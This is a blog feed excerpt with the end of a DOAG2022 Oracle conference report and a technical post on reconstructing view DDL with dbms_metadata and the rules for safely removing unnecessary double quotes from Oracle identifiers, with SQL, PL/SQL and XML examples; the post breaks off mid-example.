A highlight of this day was this talk by Hans-Jürgen Schönig. He is Austrian, a Viennese to be exact. I can imagine him as a stand-up comedian. Rarely have I laughed so hard at a technical presentation. He presented some features where PostgreSQL shines and the Oracle database does not look so good. The intention was clear. He wanted to make Oracle database fans jealous. If you have the chance to see Hans-Jürgen live, don’t miss it.

Day 2 and 3 – The Conference

The second day was the start of the real conference. 20 parallel streams with 4 to 6 English talks per time slot. The first session was at 08:00 and the last one at 17:00. A 15-minute break between the 45-minute sessions. There were for sure more attendees than at the theme day, but less than 2019 – the last in-person DOAG conference. And some exhibitors were missing. It hurts to see Robotron at the spot where the Trivadis booth was the previous years. Let’s hope for more exhibitors next year.

These are my highlights of the main conference.

Design Patterns in PL/SQL & SQL

Oren Nakdimon had the bad luck to get the 08:00 slot. However, I was lucky to meet him in the bus to the conference center. He convinced me to attend his session (of course he was already on the short list). He used a data model based on artists, genres, albums and songs for all examples and presented the following patterns:

PatternGeneric ProblemExample
Overlap checkFind rows that (partially or fully) overlap a given range.Find all artists that were living between two dates.
Extendable LOVLook-up a reference table and add new values if not exist.Get genre ID by its name. If it doesn't exist, add it.
Multi-value parametersPass multiple entities to proceduresAdd an album with its songs.
The guardian triggerWhenever some DML is done on some table T, another piece of code should be executed.Enforce the rule: an album must have at least one song.
Conditional uniquenessEnforce a business rule that requires uniqueness of an attribute (column) within a subset of the entity instances (table rows).Enforce the rule: each album may have at most one favourite song.
Correlated resultsReturn correlated data based on various inputs.Return albums – and all their songs – based on various inputs.
Arc relationshipImplement an arc relationship from a generic entity.Implement an arc relationship from images to artists and albums.

For each pattern Oren explained the problem and build the suggested solution step by step. He considered also various corner cases.

Have a look at his website where you find the slides (search for “Design Patterns in PL/SQL and SQL”). I’m sure that some of us have solved one or the other problem in a less elegant way.

Oracle Analytics Server, Make It Right from the Beginning

Gianni Ceresa‘s talk was about installing the Oracle Analytics Server the right way. However, a lot of his talk was independent of the product. Simply put it was about reading the documentation, automation and testing. “Script as much as you can” was one of Gianni’s messages. There was also an interesting side story about how a cloud provider can mess up provisioning its own product. See this blog post to learn more.

The Future of the Oracle Database

The Oracle Database version 23c is the next long-term release. The release is expected in April 2023. The beta program will start in October and ends in February 2023.  Gerald Venzl revealed in this session some new features. He presented the following features with some examples:

  • Schema Level Privileges
  • SQL Domains
  • 4096 Columns
  • JSON Schema
  • Boolean Data Type
  • UPDATE via JOIN
  • JavaScript Stored Procedures
  • IF [NOT] EXISTS
  • GROUP BY Alias / Column Position
  • Table Value Constructor
  • Better RETURNING CLAUSE
  • Developer Role
  • SELECT without FROM
  • Annotations
  • Much Better Error Messages

See this Twitter thread for some pictures per feature. More details will probably be available after CloudWorld. I’m really looking forward to get access to this release.

TAPI vs. XAPI

Jürgen Sieben explained based on a simple example the problems of accessing tables directly and using row-level triggers to apply business logic. He improved the situation by using a table API. The main disadvantage of a table API is, that it exposes the implementation such as the structure and the column names. A solution is to use a view layer for read-only access and a transaction API for write access. The table API can still be used, but only internally by the transaction API itself. Finally Jürgen explains that a CRUD based API is a technical interface that obscures the intention. To cancel an order you could delete the order with its positions. But most probably you would want to store the reason of the cancellation and change the state of the order. So, a transactional API should be designed from a business perspective.

I liked this talk very much. Not only because I totally agree with Jürgen, but also because I like the way how he explains things in a concise and easy to follow way.

Summary

I enjoyed this conference very much. Thanks to everyone who helped make this conference happen. I’m already looking forward to DOAG2023.

 

The post DOAG2022 Highlights appeared first on Philipp Salvisberg's Blog.

Quoted Identifiers #JoelKallmanDay

$
0
0

Background and TL;DR

Connor McDonald wrote a blog post named Cleaner DDL than DBMS_METADATA. Back then he asked me if it would be possible to let the formatter remove unnecessary double quotes from quoted identifiers. Yes, of course. Actually, the current version of the PL/SQL & SQL Formatter Settings does exactly that. And no, you cannot do that with dbms_metadata in the Oracle Database versions 19c and 21c. Read on if you are interested in the details.

The Problem with DBMS_METADATA …

When you execute a DDL against the Oracle Database the database stores some metadata in the data dictionary. The DDL statement itself is not stored, at least not completely. This is one reason why it is a good idea to store DDL statements in files and manage these files within a version control system. Nevertheless, the Oracle Database provides an API – dbms_metadata – to reconstruct a DDL based on the information available in the data dictionary.

Let’s create a view based on the famous dept and emp tables:

create or replace view deptsal as
   select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
    group by d.deptno, d.dname;

and retrieve the DDL like this:

select dbms_metadata.get_ddl('VIEW', 'DEPTSAL', user) from dual;

to produce this DDL:

CREATE OR REPLACE FORCE EDITIONABLE VIEW "REDSTACK"."DEPTSAL" ("DEPTNO", "DNAME", "SUM_SAL", "NUM_EMPS", "AVG_SAL") DEFAULT COLLATION "USING_NLS_COMP"  AS 
  select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
    group by d.deptno, d.dname

We see that the subquery part of the view has been preserved, except the first line which has a different indentation. Actually, the indentation of the first line is not stored in the data dictionary (see user_views.text). The two spaces are produced by the default pretty option of dbms_metadata. So far, so good.

In many cases, the Oracle Data Dictionary explicitly stores default values. For instance, Y for editionable or USING_NLS_COMP for default_collation. This fact alone makes it impossible to reconstruct the original DDL in a reliable way. The database simply does not know whether an optional clause such as editionable or default collation has been specified or omitted. Moreover, some optional DDL clauses such as or replace or force are simply not represented in the data dictionary.

… Especially with Quoted Identifiers

And last but not least, identifiers such as columns names, table names or view names are stored without double quotes. Therefore, the database knows nothing about the use of double quotes in the original DDL. However, the database knows exactly when double quotes are required. As a result, dbms_metadata could emit only necessary double quotes. This would result in a more readable DDL and would probably also be more similar to the original DDL.

The reality is that code generators such as dbms_metadata often use double quotes for all identifiers. It’s simply easier for them, because this way the generated code works for all kind of strange identifiers.

However, using quoted identifiers is a bad practice. It is, in fact, a very bad practice when they are used unnecessarily.

Shaping the DDL

So what can we do? We can configure dbms_metadata to produce a DDL which is more similar to our original one. In this case we can change the following:

  • remove the schema of the view (owner)
  • remove the force keyword
  • remove the default collation clause
  • add the missing SQL terminator (;)

This query

with
   function view_ddl(in_name in varchar2) return clob is
      l_main_handle   integer;
      l_modify_handle integer;
      l_ddl_handle    integer;
      l_ddl           clob;
   begin
      -- initialize dbms_metadata for view based on current schema
      l_main_handle   := sys.dbms_metadata.open('VIEW');
      sys.dbms_metadata.set_filter(l_main_handle, 'SCHEMA', user);
      sys.dbms_metadata.set_filter(l_main_handle, 'NAME', in_name);
      -- remove schema name from input structure
      l_modify_handle := sys.dbms_metadata.add_transform(l_main_handle, 'MODIFY');
      sys.dbms_metadata.set_remap_param(l_modify_handle, 'REMAP_SCHEMA', user, null);
      -- non-default transformations to improve DDL
      l_ddl_handle    := sys.dbms_metadata.add_transform(l_main_handle, 'DDL');
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'FORCE', false);
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'COLLATION_CLAUSE', 'NO_NLS');
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'SQLTERMINATOR', true);
      -- get DDL
      l_ddl           := sys.dbms_metadata.fetch_clob(l_main_handle);
      -- free sys.dbms_metadata resources
      sys.dbms_metadata.close(l_main_handle);
      -- return result
      return l_ddl;
   end view_ddl;
select view_ddl('DEPTSAL')
  from dual
/

produces this result:

CREATE OR REPLACE EDITIONABLE VIEW "DEPTSAL" ("DEPTNO", "DNAME", "SUM_SAL", "NUM_EMPS", "AVG_SAL") AS 
  select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
   group by d.deptno, d.dname;

This looks better. However, I would like to configure dbms_metadata to omit the default editionable clause. Furthermore, I do not like the column alias list, which is unnecessary in this case. And of course I’d like to suppress unnecessary double quotes around identifiers. Is that possible with dbms_metadata?

Shaping the DDL from (S)XML

Well, we can try. The dbms_metadata API is very extensive. Besides other things, it can also represent metadata as an XML document. There are two formats.

  • XML – An extensive XML containing internals such as object number, owner number, creation date, etc.
  • SXML – A simple and terse XML that contains everything you need to produce a DDL. The SXML format is therefore very well suited for schema comparison.

It’s possible to produce a DDL from both formats. We can also change the XML beforehand.

Let’s look at both variants in the next two subchapters.

Important: I consider the changes to the XML document and configuration of dbms_metadata in the following subchapters as experimental. The purpose is to show what is doable. They are not good examples of how it should be done. Even though the unnecessary list of column aliases annoys me, I would leave them as they are. I also think that overriding the default VERSION is a very bad idea in the long run.

Convert XML to DDL

with
   function view_ddl(in_name in varchar2) return clob is
      l_xml         xmltype;
      l_main_handle integer;
      l_ddl_handle  integer;
      l_ddl         clob;
   begin
      -- create XML document and remove unwanted nodes
      l_xml         := xmltype(sys.dbms_metadata.get_xml('VIEW', in_name, user));
      l_xml         := l_xml.deletexml('/ROWSET/ROW/VIEW_T/SCHEMA_OBJ/OWNER_NAME');
      l_xml         := l_xml.deletexml('/ROWSET/ROW/VIEW_T/COL_LIST');
      -- initialize dbms_metadata for view based on XML input
      l_main_handle := sys.dbms_metadata.openw('VIEW');
      -- non-default transformations to improve DDL
      l_ddl_handle  := sys.dbms_metadata.add_transform(l_main_handle, 'DDL');
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'FORCE', false);
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'COLLATION_CLAUSE', 'NO_NLS');
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'SQLTERMINATOR', true);
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'VERSION', 1120000000);
      -- get DDL
      sys.dbms_lob.createtemporary(l_ddl, false, sys.dbms_lob.session);
      sys.dbms_metadata.convert(l_main_handle, l_xml, l_ddl);
      -- free dbms_metadata resources
      sys.dbms_metadata.close(l_main_handle);
      -- return result
      return l_ddl;
   end view_ddl;
select xmlserialize(document xmltype(sys.dbms_metadata.get_xml('VIEW', 'DEPTSAL', user))
          as clob indent size = 4)
  from dual
union all
select view_ddl('DEPTSAL')
  from dual
/

The query produces the following two rows (CLOBs):

<?xml version="1.0"?>
<ROWSET>
    <ROW>
        <VIEW_T>
            <VERS_MAJOR>1</VERS_MAJOR>
            <VERS_MINOR>4 </VERS_MINOR>
            <OBJ_NUM>232322</OBJ_NUM>
            <SCHEMA_OBJ>
                <OBJ_NUM>232322</OBJ_NUM>
                <OWNER_NUM>501</OWNER_NUM>
                <OWNER_NAME>REDSTACK</OWNER_NAME>
                <NAME>DEPTSAL</NAME>
                <NAMESPACE>1</NAMESPACE>
                <TYPE_NUM>4</TYPE_NUM>
                <TYPE_NAME>VIEW</TYPE_NAME>
                <CTIME>2022-10-04 12:11:25</CTIME>
                <MTIME>2022-10-04 12:11:25</MTIME>
                <STIME>2022-10-04 12:11:25</STIME>
                <STATUS>1</STATUS>
                <FLAGS>0</FLAGS>
                <FLAGS2>0</FLAGS2>
                <SPARE1>6</SPARE1>
                <SPARE2>65535</SPARE2>
                <SPARE3>501</SPARE3>
                <OWNER_NAME2>REDSTACK</OWNER_NAME2>
                <SIGNATURE>76DCDE35671FAA6AF576D6A6B4D97D48</SIGNATURE>
                <SPARE7>134233583</SPARE7>
                <SPARE8>0</SPARE8>
                <SPARE9>0</SPARE9>
                <DFLCOLLNAME>USING_NLS_COMP</DFLCOLLNAME>
            </SCHEMA_OBJ>
            <AUDIT_VAL>--------------------------------------</AUDIT_VAL>
            <COLS>5</COLS>
            <INTCOLS>5</INTCOLS>
            <PROPERTY>0</PROPERTY>
            <PROPERTY2>0</PROPERTY2>
            <FLAGS>0</FLAGS>
            <TEXTLENGTH>270</TEXTLENGTH>
            <TEXT>select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
   group by d.deptno, d.dname</TEXT>
            <COL_LIST>
                <COL_LIST_ITEM>
                    <OBJ_NUM>232322</OBJ_NUM>
                    <COL_NUM>1</COL_NUM>
                    <INTCOL_NUM>1</INTCOL_NUM>
                    <SEGCOL_NUM>1</SEGCOL_NUM>
                    <PROPERTY>0</PROPERTY>
                    <PROPERTY2>0</PROPERTY2>
                    <NAME>DEPTNO</NAME>
                    <TYPE_NUM>2</TYPE_NUM>
                </COL_LIST_ITEM>
                <COL_LIST_ITEM>
                    <OBJ_NUM>232322</OBJ_NUM>
                    <COL_NUM>2</COL_NUM>
                    <INTCOL_NUM>2</INTCOL_NUM>
                    <SEGCOL_NUM>2</SEGCOL_NUM>
                    <PROPERTY>0</PROPERTY>
                    <PROPERTY2>0</PROPERTY2>
                    <NAME>DNAME</NAME>
                    <TYPE_NUM>1</TYPE_NUM>
                </COL_LIST_ITEM>
                <COL_LIST_ITEM>
                    <OBJ_NUM>232322</OBJ_NUM>
                    <COL_NUM>3</COL_NUM>
                    <INTCOL_NUM>3</INTCOL_NUM>
                    <SEGCOL_NUM>3</SEGCOL_NUM>
                    <PROPERTY>14336</PROPERTY>
                    <PROPERTY2>0</PROPERTY2>
                    <NAME>SUM_SAL</NAME>
                    <TYPE_NUM>2</TYPE_NUM>
                </COL_LIST_ITEM>
                <COL_LIST_ITEM>
                    <OBJ_NUM>232322</OBJ_NUM>
                    <COL_NUM>4</COL_NUM>
                    <INTCOL_NUM>4</INTCOL_NUM>
                    <SEGCOL_NUM>4</SEGCOL_NUM>
                    <PROPERTY>14336</PROPERTY>
                    <PROPERTY2>0</PROPERTY2>
                    <NAME>NUM_EMPS</NAME>
                    <TYPE_NUM>2</TYPE_NUM>
                </COL_LIST_ITEM>
                <COL_LIST_ITEM>
                    <OBJ_NUM>232322</OBJ_NUM>
                    <COL_NUM>5</COL_NUM>
                    <INTCOL_NUM>5</INTCOL_NUM>
                    <SEGCOL_NUM>5</SEGCOL_NUM>
                    <PROPERTY>14336</PROPERTY>
                    <PROPERTY2>0</PROPERTY2>
                    <NAME>AVG_SAL</NAME>
                    <TYPE_NUM>2</TYPE_NUM>
                </COL_LIST_ITEM>
            </COL_LIST>
            <COL_LIST2/>
            <CON1_LIST/>
            <CON2_LIST/>
        </VIEW_T>
    </ROW>
</ROWSET>

CREATE OR REPLACE VIEW "DEPTSAL" () AS 
  select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
    group by d.deptno, d.dname;

We removed the OWNER_NAME node (on line 11) from the XML document. As a result, the schema was removed in the DDL. The result is the same as with the REMAP_SCHEMA transformation. Perfect.

We also removed the COL_LIST node (line 48-99) from the XML document. However, the result in the DDL regarding the column alias list does not look good. The columns are gone, but the surrounding parentheses survived, which makes the DDL invalid. IMO this is a bug of the $ORACLE_HOME/rdbms/xml/xsl/kuview.xsl script. It’s handled correctly in the SXML script as we will see later. However, we can fix that by calling replace(..., '" () AS', '" AS') . Please note that a complete solution should do some checks to ensure that the COL_LIST is really not required.

When you look at line 12 in the XML document (<NAME>DEPTSAL</NAME>), you see that the view name does not contain double quotes. This is a strong indicator, that there is no way to remove the double quotes by manipulating the input XML document. In fact, the double quotes are hard-coded in all XSLT scripts. No way to override this behavior via dbms_metadata.

Furthermore you do not find a node named like EDITIONABLE with a value Y as in all_objects. Why? Because this information is stored in the node FLAGS. 0 means editionable and 1048576 means noneditionable. To be precise 1048576 represents bit number 21. If this bit is set then the view is noneditionable. You find the proof for this statement in the dba_objects view, where the expression for the editionable column looks like this:

case
   when o.type# in (
      4, 5, 7, 8, 9, 11, 12, 13, 14, 22, 87, 114
   )
   then
      decode(
         bitand(o.flags, 1048576),
            0,       'Y', 
            1048576, 'N', 
                     'Y'
      )
   else
      null
end

The $ORACLE_HOME/rdbms/xml/xsl/kucommon.xsl script (see template Editionable) is evaluating this flag and either emitting a EDITIONABLE or NONEDITIONABLE text. These keywords were introduced in version 12.1. Since dbms_metadata can produce version specific DDL, we set the version to 11.2 to suppress EDITIONABLE in the resulting DDL.

Convert SXML to DDL

with
   function view_ddl(in_name in varchar2) return clob is
      l_sxml        xmltype;
      l_main_handle integer;
      l_ddl_handle  integer;
      l_ddl         clob;
   begin
      -- create SXML document and remove unwanted nodes
      l_sxml        := xmltype(sys.dbms_metadata.get_sxml('VIEW', in_name, user));
      l_sxml        := l_sxml.deletexml('/VIEW/SCHEMA', 'xmlns=http://xmlns.oracle.com/ku');
      l_sxml        := l_sxml.deletexml('/VIEW/COL_LIST', 'xmlns=http://xmlns.oracle.com/ku');
      -- initialize dbms_metadata for view based on SXML input
      l_main_handle := sys.dbms_metadata.openw('VIEW');
      -- non-default transformations to improve DDL
      l_ddl_handle  := sys.dbms_metadata.add_transform(l_main_handle, 'SXMLDDL');
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'FORCE', false);
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'COLLATION_CLAUSE', 'NO_NLS');
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'SQLTERMINATOR', true);
      sys.dbms_metadata.set_transform_param(l_ddl_handle, 'VERSION', 1120000000);
      -- get DDL
      sys.dbms_lob.createtemporary(l_ddl, false, sys.dbms_lob.session);
      sys.dbms_metadata.convert(l_main_handle, l_sxml, l_ddl);
      -- free dbms_metadata resources
      sys.dbms_metadata.close(l_main_handle);
      -- return result
      return l_ddl;
   end view_ddl;
select xmlserialize(document xmltype(sys.dbms_metadata.get_sxml('VIEW', 'DEPTSAL', user))
          as clob indent size = 4)
  from dual
union all
select view_ddl('DEPTSAL')
  from dual
/

The query produces the following two rows (CLOBs):

<VIEW xmlns="http://xmlns.oracle.com/ku" version="1.0">
    <SCHEMA>REDSTACK</SCHEMA>
    <NAME>DEPTSAL</NAME>
    <DEFAULT_COLLATION>USING_NLS_COMP</DEFAULT_COLLATION>
    <COL_LIST>
        <COL_LIST_ITEM>
            <NAME>DEPTNO</NAME>
        </COL_LIST_ITEM>
        <COL_LIST_ITEM>
            <NAME>DNAME</NAME>
        </COL_LIST_ITEM>
        <COL_LIST_ITEM>
            <NAME>SUM_SAL</NAME>
        </COL_LIST_ITEM>
        <COL_LIST_ITEM>
            <NAME>NUM_EMPS</NAME>
        </COL_LIST_ITEM>
        <COL_LIST_ITEM>
            <NAME>AVG_SAL</NAME>
        </COL_LIST_ITEM>
    </COL_LIST>
    <SUBQUERY>select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
   group by d.deptno, d.dname</SUBQUERY>
</VIEW>

CREATE OR REPLACE VIEW ""."DEPTSAL" 
  AS 
  select d.deptno,
          d.dname,
          nvl(sum(e.sal), 0) as sum_sal,
          nvl(count(e.empno), 0) as num_emps,
          nvl(round(avg(e.sal), 2), 0) as avg_sal
     from dept d
     left join emp e
       on e.deptno = d.deptno
    group by d.deptno, d.dname;

The SXML document is smaller. It contains just the nodes to produce a DDL. That makes it easier to read.

We removed the SCHEMA node (on line 2) from the SXML document. As a result, the schema was removed in the DDL. But not completely. Two double quotes and one dot survived, which makes the DDL invalid. IMO this is a bug of the $ORACLE_HOME/rdbms/xml/xsl/kusviewd.xsl script. It’s handled correctly in the XML script. We could fix that with a replace(..., 'VIEW ""."', 'VIEW "') call. As long as the search term is not ambiguous, everything should be fine.

We also removed the COL_LIST node (line 5-21) from the SXML document. In this case the column alias list is completely removed from the DDL. Including the parentheses. Nice.

Maybe you wonder how editionable is represented in the SXML document. – With a NONEDITIONABLE node if the view is noneditionable.

How Can We Work Around the Limitations?

We’ve seen the limitations of the current dbms_metadata API and the necessity to use string manipulation functions to fix invalid DDL.

There is no way to remove double quotes from quoted identifiers with dbms_metadata. However, as Connor McDonald demonstrated in his blog post we can remove them with some string acrobatics. Why not use a simple replace call? Because there are some rules to follow. A globally applied replace(..., '"', null) call would produce invalid code in many real life scenarios. We need a more robust solution.

Applying the rules in a code formatter can be such a robust solution.

Rules for Safely Removing Double Quotes from Quoted Identifiers

What are the rules to follow?

1. Is a SQL or PL/SQL Identifier

You have to make sure that the double quotes surround a SQL or PL/SQL identifier. Sounds logical. However, it is not that simple. Here are some examples:

create or replace procedure plsql_comment is
begin
   -- "NOT_AN_IDENTIFIER"
   /*
      "NOT_AN_IDENTIFIER"
   */
   null;
end;
/

create or replace procedure plsql_string is
   l_string1 varchar2(100 char);
   l_string2 varchar2(100 char);
begin
   l_string1 := '"NOT_AN_IDENTIFIER"';
   l_string2 := q'[
                   "NOT_AN_IDENTIFIER"
                ]';
end;
/

create or replace procedure plsql_conditional_compilation_text is
begin
   $if false $then
      Conditional compilation blocks can contain any text.
      It does not need to be valid PL/SQL.
      "NOT_AN_IDENTIFIER"
      FTLDB and tePLSQL use this construct to store code templates in such blocks.
   $end
   null;
end;
/

create or replace and resolve java source named "JavaString" as
public class JavaString {
  public static String hello() {
     return "NOT_AN_IDENTIFIER";
  }
}
/

You can solve the first three examples easily with a lexer. A lexer groups a stream of characters. Such a group of characters is called a lexer token. A lexer token knows the start and end position in a source text and has a type. The lexer in SQL Developer and SQLcl produces the following types of tokens:

  • COMMENT (/* ... */)
  • LINE_COMMENT (-- ...)
  • QUOTED_STRING ('string' or q'[string]')
  • DQUOTED_STRING ("string" )
  • WS (space, tab, new line, carriage return)
  • DIGITS (0123456789 plus some special cases)
  • OPERATION (e.g. ()[]^-|!*+.><=,;:%@?/~)
  • IDENTIFIER (words)
  • MACRO_SKIP (conditional compilation tokens such as $if, $then, etc.)

We can simply focus on tokens of type DQUOTED_STRING and ignore tokens that are within conditional compilation tokens $if and $end.

To find out if a DQUOTED_STRING is part of a Java stored procedure is more difficult. Luckily SQL Developer’s parser cannot deal with Java stored procedures and produces a parse error. As a result, we just have to keep the code “as is” in such cases.

2. Consists of Valid Characters

According to the PL/SQL Language Reference an nonquoted identifier must comply with the following rules:

An ordinary user-defined identifier:

  • Begins with a letter
  • Can include letters, digits, and these symbols:
    • Dollar sign ($)
    • Number sign (#)
    • Underscore (_)

What is a valid letter in this context? The SQL Language Reference defines a letter as an “alphabetic character from your database character set”. Here are some examples of valid letters and therefore valid PL/SQL variable names or SQL column names:

  • Latin letters (AaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWwXxYyZz)
  • Umlauts (ÄäËëÏïÖöÜüŸÿ)
  • German Esszett (ẞß), please note that the Oracle Database does not convert the case of an Esszett, because the uppercase Esszett exists offically only since 2017-03-29
  • C cedilla (Çç)
  • Grave accented letters (ÀàÈèÌìÒòÙù)
  • Acute accented letters (ÁáĆćÉéÍíÓóÚúÝý)
  • Circumflex accented letters (ÂâÊêÎîÔôÛû)
  • Tilde accented letters (ÃãÑñÕõ)
  • Caron accented letters (ǍǎB̌b̌ČčĚěF̌f̌ǦǧȞȟǏǐJ̌ǰǨǩM̌m̌ŇňǑǒP̌p̌Q̌q̌ŘřŠšǓǔV̌v̌W̌w̌X̌x̌Y̌y̌ŽžǮǯ)
  • Ring accented letters (ÅåŮů)
  • Greek letters (ΑαΒβΓγΔδΕεΖζΗηΘθΙιΚκΛλΜμΝνΞξΟοΠπΡρΣσΤτΥυΦφΧχΨψΩω)
  • Common Cyrillic letters (АаБбВвГгДдЕеЁёЖжЗзИиЙйКкЛлМмНнОоПпРрСсТтУуФфХхЦцЧчШшЩщЪъЫыЬьЭэЮюЯя)
  • Hiragana letters (ぁあぃいぅうぇえぉおかがきぎくぐけげこごさざしじすずせぜそぞただちぢっつづてでとどなにぬねのはばぱひびぴふぶぷへべぺほぼぽまみむめもゃやゅゆょよらりるれろゎわゐゑをんゔゕゖゝゞゟ)

The Oracle Database throws an  ORA-00911: invalid character when this rule is violated.

Cause: The identifier name started with an ASCII character other than a letter or a number. After the first character of the identifier name, ASCII characters are allowed including “$”, “#” and “_”. Identifiers enclosed in double quotation marks may contain any character other than a double quotation. Alternate quotation marks (q’#…#’) cannot use spaces, tabs, or carriage returns as delimiters. For all other contexts, consult the SQL Language Reference Manual.

The cause for this error message seems to be outdated, inaccurate and wrong. Firstly, it limits letters to those contained in an ASCII character set. This limitation is not generally valid anymore. Secondly, it claims that an identifier can start with a number, which is simply wrong. Thirdly, ASCII characters and letters are used as synonyms, which is misleading.

However, there are still cases where an identifier is limited to ASCII characters or single byte characters. For example, a database name or a database link name. In the projects I know, the reduction of letters to A-Z for identifiers is not a problem. The use of accented letters in identifiers are typically oversights. Therefore, I recommend limiting the range of letters in identifiers to A-Z .

Checking this rule is quite simple. We just have to make sure that the quoted identifier matches this regular expression: ^"[A-Z][A-Z0-9_$#]*"$. This works with any regular expression engine, unlike ^"[[:alpha:]][[:alpha:]0-9_$#]*"$.

3. Is Not a Reserved Word

According to the PL/SQL Language Reference and the SQL Language Reference an nonquoted identifier must not be a reserved word.

If you are working with 3rd party parsers, the list of reserved words might not match the ones defined for the Oracle Database. In my case I also want to consider the reserved words defined by db* CODECOP. I’m using the following query to create a JSON array with currently 260 keywords:

select json_arrayagg(keyword order by keyword) as keywords
  from (
          -- reserved keywords in Oracle database 21.3.0.0.0 (ATP)
          select keyword
            from v$reserved_words
           where (reserved = 'Y' or res_type = 'Y' or res_attr = 'Y' or res_semi = 'Y')
             and keyword is not null
             and regexp_like(keyword, '^[A-Z][A-Z0-9_$#]*$') -- valid nonquoted identifier
          union
          -- reserved keywords in db* CODECOP's PL/SQL parser 4.2.0
          select keyword
            from json_table(
                    '["AFTER","ALL","ALLOW","ALTER","ANALYTIC","AND","ANYSCHEMA","AS","ASC","ASSOCIATE","AUTHID","AUTOMATIC",
                      "AUTONOMOUS_TRANSACTION","BEFORE","BEGIN","BETWEEN","BULK","BY","BYTE","CANONICAL","CASE",
                      "CASE-SENSITIVE","CHECK","CLUSTER","COMPOUND","CONNECT","CONNECT_BY_ROOT","CONSTANT","CONSTRAINT",
                      "CONSTRUCTOR","CORRUPT_XID","CORRUPT_XID_ALL","CREATE","CROSSEDITION","CURRENT","CUSTOMDATUM",
                      "CYCLE","DB_ROLE_CHANGE","DECLARE","DECREMENT","DEFAULTS","DEFINE","DEFINER","DETERMINISTIC",
                      "DIMENSION","DISALLOW","DISASSOCIATE","DISTINCT","DROP","EACH","EDITIONING","ELSE","ELSIF",
                      "END","EVALNAME","EXCEPTION","EXCEPTION_INIT","EXCEPTIONS","EXCLUSIVE","EXTERNAL","FETCH",
                      "FOLLOWING","FOLLOWS","FOR","FORALL","FROM","GOTO","GRANT","GROUP","HAVING","HIDE","HIER_ANCESTOR",
                      "HIER_LAG","HIER_LEAD","HIER_PARENT","IF","IGNORE","IMMUTABLE","IN","INCREMENT","INDEX","INDICATOR",
                      "INDICES","INITIALLY","INLINE","INSERT","INSTEAD","INTERSECT","INTO","INVISIBLE","IS","ISOLATION",
                      "JAVA","JSON_EXISTS","JSON_TABLE","LATERAL","LIBRARY","LIKE","LIKE2","LIKE4","LIKEC","LOCK","LOGON",
                      "MAXVALUE","MEASURES","MERGE","MINUS","MINVALUE","MULTISET","MUTABLE","NAN","NAV","NCHAR_CS","NOCOPY",
                      "NOCYCLE","NONSCHEMA","NORELY","NOT","NOVALIDATE","NOWAIT","OF","ON","ONLY","OPTION","OR","ORADATA",
                      "ORDER","ORDINALITY","OVER","OVERRIDING","PARALLEL_ENABLE","PARTITION","PASSING","PAST","PIPELINED",
                      "PIVOT","PRAGMA","PRECEDES","PRECEDING","PRESENT","PRIOR","PROCEDURE","REFERENCES","REFERENCING",
                      "REJECT","RELY","REPEAT","RESPECT","RESTRICT_REFERENCES","RESULT_CACHE","RETURNING","REVOKE",
                      "SELECT","SEQUENTIAL","SERIALIZABLE","SERIALLY_REUSABLE","SERVERERROR","SETS","SHARE","SIBLINGS",
                      "SINGLE","SOME","SQL_MACRO","SQLDATA","STANDALONE","START","SUBMULTISET","SUBPARTITION",
                      "SUPPRESSES_WARNING_6009","THE","THEN","TO","TRIGGER","UDF","UNBOUNDED","UNDER","UNION",
                      "UNIQUE","UNLIMITED","UNPIVOT","UNTIL","UPDATE","UPSERT","USING","VALUES","VARRAY","VARYING",
                      "VIEW","WHEN","WHERE","WHILE","WINDOW","WITH","XMLATTRIBUTES","XMLEXISTS","XMLFOREST",
                      "XMLNAMESPACES","XMLQUERY","XMLROOT","XMLSCHEMA","XMLSERIALIZE","XMLTABLE"]',
                    '$[*]' columns (keyword path '$')
                 )
       );

The result can be used to populate a HashSet. This allows you to check very efficiently whether an identifier is a keyword.

Of course, such a global list of keywords is a simplification. In reality, the restrictions are context-specific. However, I consider the use of keywords for identifiers in any context a bad practice. Therefore, I can live with some unnecessarily quoted identifiers.

4. Is in Upper Case

This means that the following condition must be true: quoted_identifier = upper(quoted_identifier).

This does not necessarily mean that the identifier is case-insensitive as the following examples show:

set pagesize 100
column key format A3
column value format A5
set null "(-)"

-- OK, KEY/VALUE are clearly case-sensitive
select j.pair."KEY", j.pair."VALUE"
  from json_table('[{KEY:1, VALUE:"One"},{KEY:2, VALUE:"Two"}]',
          '$[*]' columns (pair varchar2(100) format json path '$')) j;

KEY VALUE
--- -----
1   One  
2   Two  

-- OK, KEY/VALUE are case-sensitive, but you have to "know" that
select j.pair.KEY, j.pair.VALUE
  from json_table('[{KEY:1, VALUE:"One"},{KEY:2, VALUE:"Two"}]',
          '$[*]' columns (pair varchar2(100) format json path '$')) j;

KEY VALUE
--- -----
1   One  
2   Two  
          
